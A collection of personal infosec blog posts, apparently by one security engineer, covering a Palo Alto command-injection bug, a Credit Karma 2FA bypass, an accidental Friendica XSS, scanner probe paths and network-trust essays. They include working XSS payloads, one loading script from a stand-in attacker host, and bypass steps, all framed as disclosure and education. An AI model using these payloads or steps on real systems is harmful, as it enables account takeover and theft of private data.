infosec
In March, Waltz came under scrutiny after he put together a Signal chat and mistakenly included The Atlantic’s Jeffrey Goldberg, disclosing discussions with top national security officials about plans for a military strike on Houthi targets in Yemen.
Part of being a security adviser is being, you know, competent at security.
- Screenshot your LinkedIn app home screen.
- Make a web page with that background.
- Add a link at the top to display the QR code of your choice.
- Add a link to that on your home screen.
Voila. Now you can make anyone at any tech conference open the QR code of your choosing. “Hey, let’s be buddies!”
How to bypass Credit Karma's 2FA
Locked out of your Credit Karma account’s 2FA? No problem! Here’s how I can log into mine:
- Log in with my username and password.
- Try the 2FA challenge once and let it fail.
- Navigate to accounts.creditkarma.com
Ta-da! I’m in. I reported this a month ago but they haven’t acknowledged it as an issue yet. If I stumbled across this, you can bet the bad guys are already using it.
2025-03-17: I report a critical vulnerability (trivial, complete 2FA bypass) to a well-known company’s security email alias. No reply.
2025-04-07: I report it again to their bug bounty program.
2025-04-09: They close it as a duplicate.
Their bug bounty program says, basically, “we never disclose reports. Don’t discuss them with anyone.”
23 days into this episode, I’m starting to weigh the responsible thing to do here.
AWS WAF now uses /64s instead of /128s for IPv6 rate-limit bucketing. That’s a huge and welcome improvement!
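That matters because a single IPv6 subscriber typically gets a whole /64, so rate limiting individual /128s lets one visitor dodge the limit by hopping between addresses. A quick sketch of prefix bucketing (the address is a made-up documentation value):

import ipaddress

# Bucket clients by their /64 prefix rather than the full /128 address, so one
# visitor can't evade a rate limit by rotating addresses within their block.
addr = ipaddress.ip_address("2001:db8:1234:5678:aaaa:bbbb:cccc:dddd")
bucket_key = ipaddress.ip_network(f"{addr}/64", strict=False)
print(bucket_key)  # 2001:db8:1234:5678::/64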
Credit Karma stopped accepting my decade-old Google Voice phone number for 2FA. It won’t let me change to use my regular number because we were already using that for my wife’s account (which she asked me to manage for her). Their support’s idea for resolving this? Just ask Verizon for a new temporary phone number each month or so forever.
Um, no.

The coffee shop is fine
I hear too many acquaintances worry that employees might work from a coffee shop or other public network, putting their whole company at risk. So what if they do? The idea that a coffee shop’s Wi-Fi is insecure implies that there’s a mythical “secure” network that can be trusted with the company’s secrets. That’s almost never true.
Work-from-home employees are on a tame home Wi-Fi setup, right? Don’t count on it. Is their gear current? Are they sharing Wi-Fi with their neighbors? Are they using their apartment building’s network? Who’s their ISP? Although their home setup might – or might not – have fewer people on it than the local cafe’s, that doesn’t make it trustworthy.
What about the employees we coerced into returning to a legacy office and using its Wi-Fi? Oh. You mean that named network that sits there with a target on its back because everyone knows it belongs to important people? Unless you manage your own office, and it’s in a Faraday cage blocking all outbound or inbound radio signals, and you pretend that MAC filtering is a security feature, and all your equipment is patched with the latest security updates, and you have guards walking around with fox hunt antennas to spot rogue access points, it’s not substantially better in the ways that count. If you can read this at work, at least a few of those assumptions are likely wrong.
The idea of a “trusted network” is dead. It’s time we stop pretending. If an employee can be compromised at the coffee shop, they can be compromised at the office. We have to design our defenses as though our staff are working from the free network at DEF CON. That means making sure all employee devices and servers are patched. That all connections are encrypted, even those between internal systems. That authentication uses cryptography, not passwords. That we don’t pretend that “route all traffic” VPNs are a good idea. That we don’t rely on allowlisted IPs as a critical defense. That we don’t trust any network our employees might use, and that our systems are robust enough to endure hostile environments. Yes, even the ones we tell ourselves are safe.
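As one illustration of what “encrypted connections, even between internal systems” and “authentication uses cryptography, not passwords” can look like, here’s a minimal sketch of a service-to-service call over mutual TLS. The hostname and certificate paths are placeholders, not anything from a real setup:

import requests

# Even "internal" traffic is encrypted and authenticated with certificates,
# not passwords or source-IP allowlists. Hostname and paths are placeholders.
response = requests.get(
    "https://reports.internal.example.com/api/v1/summary",
    cert=("/etc/pki/service/client.crt", "/etc/pki/service/client.key"),  # client identity (mTLS)
    verify="/etc/pki/service/internal-ca.pem",  # trust only the internal CA
    timeout=10,
)
response.raise_for_status()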
And if we’re not comfortable with our coworkers typing away next to a fresh latte, it’s our responsibility to figure out what part of that bothers us and then fix it. The issues that would make that scenario dangerous affect the “secure” office, too.
The email: Click here to enhance your account’s security with two-factor authentication!
Click.
The website: Please enter your phone number to receive your access code.
Cmd-W.
When a coworker forwards you an email to ask if it looks like phishing, take a moment to publicly praise them for it. “Jane sent me an example of a new phishing campaign going around. Her instinct to let us know about it was exactly right. Thanks, Jane!” Reinforce the idea that Security has their back and will be pleasant to interact with. That’s how you get them to want to report things.
Polyfill supply chain attack hits 100K+ sites:
The polyfill.js is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io domain. Notable users are JSTOR, Intuit and World Economic Forum. However, in February this year, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io.
This is fine.
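If you run sites of your own, a rough check for the compromised domain might look like this; the URL is a placeholder for one of your own pages:

import urllib.request

# Fetch a page you control and look for the compromised domain.
page = urllib.request.urlopen("https://example.com/").read().decode("utf-8", "replace")
if "cdn.polyfill.io" in page:
    print("This page still references cdn.polyfill.io - remove or self-host the script.")
else:
    print("No cdn.polyfill.io reference found.")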
This is interesting and dangerous. I’m trying the new macOS Sequoia Passwords app. I exported my passwords from 1Password to a CSV and imported them into the new app, then soon saw a bunch of ancient logins from old employers. What? Searching for them in 1Password found nothing.
Oh, turns out those are archived in 1Password. The normal cmd-F search doesn’t look in Archive even if you’ve selected it. The other opt-cmd-F find does.
Hope you remembered to delete the passwords that would get you beaten up.
Little Snitch 6 came out yesterday with many quality of life improvements.
It’s always the first app I install on a new Mac. New versions are no-brainer upgrades for me. I still wish it had a way to sync rulesets between Macs so that I don’t have to train each one independently.
I am not exaggerating this:
I created a new hostname in DNS, then added it to my existing webserver config.
It was online for 3 seconds – 3! – before getting a 404 request for /.git/config.
If you’re relying on obscurity to protect your services, get that right out of your fool head today. You have about 3 seconds to get your act together.
In the time it took me to type this, I got another 62 requests:
30 "/"
3 "/.git/config"
2 "/.vscode/sftp.json"
2 "/v2/_catalog"
2 "/telescope/requests"
2 "/server-status"
2 "/server"
2 "/s/431323e2230323e2134323e2239313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
2 "/?rest_route=/wp/v2/users/"
2 "/login.action"
2 "/.env"
2 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
2 "/.DS_Store"
2 "/debug/default/view?panel=config"
2 "/config.json"
2 "/_all_dbs"
2 "/about"
You know how sometimes you come to decide that an entire niche market is so filled with awful and overpriced alternatives that you’d rather just write your own and give it away for free?
My toes are on the precipice.
Conference tracks where more than a few people are wearing khaki:
- Defending your AI assets
- Defending your assets from AI
- Defending your assets with AI
Additional conference tracks where more than a few people have primary colored hair:
- Prompt injection for lolz and cash
Palo Alto's exploited Python code
watchTowr Labs has a nice blog post dissecting CVE-2024-3400. It’s very readable. Go check it out.
The awfulness of Palo Alto’s Python code in this snippet stood out to me:
def some_function():
    ...
    if source_ip_str is not None and source_ip_str != "":
        curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s --interface %s" \
            %(signedUrl, fname, capath, source_ip_str)
    else:
        curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s" \
            %(signedUrl, fname, capath)
    if dbg:
        logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
    stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
    ...

def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
    """call shell-command and either return its output or kill it
    if it doesn't normally exit within timeout seconds"""
    # Define dosys specific constants here
    PANSYS_POST_SIGKILL_RETRY_COUNT = 5
    # how long to pause between poll-readline-readline cycles
    PANSYS_DOSYS_PAUSE = 0.1
    # Use first_wait if time to complete is lengthy and can be estimated
    if first_wait == None:
        first_wait = PANSYS_DOSYS_PAUSE
    # restrict the maximum possible dosys timeout
    PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
    # Can support upto 2GB per stream
    out = StringIO()
    err = StringIO()
    try:
        if shell:
            cmd = command
        else:
            cmd = command.split()
    except AttributeError:
        cmd = command
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
                         stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
    timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
It uses string building to create a curl command line. Then it passes that command line down into a function that calls subprocess.Popen(cmd_line, shell=True). What? No! Don’t ever do that!
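For contrast, here’s a minimal sketch of the safer pattern: build an argument list and skip the shell entirely, so hostile input can’t smuggle extra commands into the pipeline. The values below are placeholders standing in for the variables in the snippet above:

import subprocess

# Build an argument list instead of a shell string; with no shell involved,
# the values are passed to curl verbatim and can't inject extra commands.
signed_url = "https://example.com/upload"  # placeholder for signedUrl
fname = "/tmp/payload.bin"                 # placeholder for fname
capath = "/etc/ssl/certs"                  # placeholder for capath
source_ip_str = ""                         # placeholder for source_ip_str

cmd = [
    "/usr/bin/curl", "-v",
    "-H", "Content-Type: application/octet-stream",
    "-X", "PUT", signed_url,
    "--data-binary", "@" + fname,
    "--capath", capath,
]
if source_ip_str:
    cmd += ["--interface", source_ip_str]

result = subprocess.run(cmd, capture_output=True, text=True, timeout=250)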
I fed that code into the open source bandit static analyzer. It flagged this code with a high severity, high confidence finding:
ᐅ bandit pan.py
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.12.1
Run started:2024-04-16 17:14:52.240258
Test results:
>> Issue: [B604:any_other_function_with_shell_equals_true] Function call with shell=True parameter identified, possible security issue.
Severity: Medium Confidence: Low
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b604_any_other_function_with_shell_equals_true.html
Location: ./pan.py:14:26
13 logger.info("S2: XFILE: send_file: curl cmd: '%s'" % curl_cmd)
14 stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
15
--------------------------------------------------
>> Issue: [B602:subprocess_popen_with_shell_equals_true] subprocess call with shell=True identified, security issue.
Severity: High Confidence: High
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html
Location: ./pan.py:49:8
48 bufsize=1,
49 shell=shell,
50 stderr=subprocess.PIPE,
51 close_fds=close_fds,
52 universal_newlines=True,
53 )
54 timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
--------------------------------------------------
Code scanned:
Total lines of code: 41
Total lines skipped (#nosec): 0
Run metrics:
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 1
High: 1
Total issues (by confidence):
Undefined: 0
Low: 1
Medium: 0
High: 1
Files skipped (0):
From that we can infer that Palo Alto does not use effective static analysis on their Python code. If they did, this code would not have made it to production.
Veilid in The Washington Post
I’ve been helping on a fun project with some incredibly brilliant friends. I found myself talking about it to a reporter at The Washington Post. The story just came out. My part was crucial, insightful, and far, far down the page:
Once known for distributing hacking tools and shaming software companies into improving their security, a famed group of technology activists is now working to develop a system that will allow the creation of messaging and social networking apps that won’t keep hold of users’ personal data. […] “It’s a new way of combining [technologies] to work together,” said Strauser, who is the lead security architect at a digital health company.
You bet I’m letting this go to my head.
At work: “Kirk, I think you’re wrong.” “Well, one of us was featured in WaPo, so we’ll just admit that I’m the expert here.”
At home: “Honey, can you take the trash out?” “People in The Washington Post can’t be expected to just…” “Take this out, ‘please’.”
But really, Veilid is incredibly neat and I’m awed by the people I’ve been lucky to work with. Check it out after the launch next week at DEF CON 31.
I use Things without encryption
Update 2023-11-03: No, I don’t.
I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:
- Lacks end-to-end encryption
I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:
I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.
I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)
Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.
Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.
While I don’t like that Things lacks E2EE, and I wish that it had it, the lack isn’t important enough, given how I use the app, to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits I get from Things over those options make it worthwhile for me to hold my nose and use it.
Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.
But I know I should still look for something more secure.
Accidentally Hacking the Planet
Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:
<script type="text/javascript">alert("I was here.");</script>
Because I’m kind of a smartass, I later changed my Mastodon username to something similar:
<script>alert("Tek");</script>
Then I laughed about it with my geeky friends and promptly forgot all about the joke.
And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.
- An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
- The attack was simple: I changed my username to a bit of valid JavaScript.
- All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
- My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
  <script src="https://hackerz.ru/badstuff.js">Hi</script>
- The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.
That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.[1] Satisfied that the right people had been notified, I went back to bed.
The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”[2]
My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:
<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>
It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.
I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.
To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.
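The underlying class of fix is simple: escape untrusted text before embedding it in HTML so it renders as text instead of executing. Friendica is written in PHP, so this Python sketch only illustrates the general idea, not their actual patch:

import html

display_name = '<script>alert("Tek");</script>'  # untrusted, user-controlled text

# Escaped, the browser shows the tag as literal text instead of running it.
print(html.escape(display_name))
# &lt;script&gt;alert(&quot;Tek&quot;);&lt;/script&gt;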
It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.

[1] Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎
[2] Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎
The Internet is a rough neighborhood
This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.

Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.
“I run my service on a custom port!” Doesn’t matter.
“I use IPv6!” Doesn’t matter.
“I’m just a nobody!” Doesn’t matter.
Practice safer networking, every time, all the time.